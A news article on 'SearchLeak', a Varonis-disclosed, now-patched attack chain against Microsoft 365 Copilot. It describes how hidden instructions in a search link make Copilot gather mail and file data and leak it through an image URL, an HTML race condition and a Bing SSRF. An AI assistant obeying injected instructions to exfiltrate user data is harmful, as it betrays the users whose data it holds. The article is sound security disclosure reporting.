- Varonis discovered “SearchLeak,” chaining three vulnerabilities in Microsoft 365 Copilot to enable data theft in one click
- The attack leveraged rapid injection, HTML race condition, and Bing SSRF to exfiltrate data from Inbox, OneDrive, and SharePoint.
- Microsoft patched CVE‑2026‑42824 earlier this month, giving it a critical rating of 10/10.
Experts have discovered a way to turn Microsoft 365 Copilot into a one-click data theft tool capable of exfiltrating sensitive information from users’ inboxes, OneDrive, and SharePoint instances.
The method was recently patched by Microsoft after being developed by security researchers Varonis, who dubbed the method SearchLeak, explaining that it works by chaining three vulnerabilities together.
Separately, these three things can’t do much harm, but together they are strong enough to warrant a fix.
Exfiltration agent
The three linked flaws are a parameter injection to a prompt, a race condition for HTML rendering, and a Content Security Policy (CSP) bypass enabled by Bing Server-Side Request Forgery (SSRF).
The attack starts when a victim clicks on a specially crafted Microsoft 365 Copilot Enterprise Search link. The URL contains instructions hidden in the search query parameter, telling Copilot to search the victim’s emails, OneDrive files, SharePoint documents, or calendar data and include the results in an image URL.
While Copilot generates its response, a race condition causes the browser to briefly display attacker-controlled HTML before Microsoft’s sanitization process completes. This allows an image tag containing the stolen data to run.
Finally, the image request is routed through Bing’s “Search by Image” feature and, due to the SSRF flaw, Bing can retrieve the attacker-controlled URL on behalf of the victim and bypass Content Security Policy protections. Sensitive data embedded in the URL is thus transmitted to the attacker’s server, where the attacker can retrieve it from web request logs.
“Bing becomes an unintended exfiltration proxy,” the researchers explain. “A classic SSRF, hidden in plain sight behind a CSP whitelist entry.”
Varonis claims that on the victim’s side, all they see is a normal Copilot search session, and points out that AI has turned simple, easy-to-fix vulnerabilities, such as SSRF and HTML injection race conditions, into powerful vulnerabilities.
Earlier this month, Microsoft patched the flaw, giving it a maximum severity rating (10/10 critical) and tracking it as CVE-2026-42824.
Via BeepComputer
The best antivirus for every budget
Follow TechRadar on Google News And add us as your favorite source to get our news, reviews and expert opinions in your feeds.
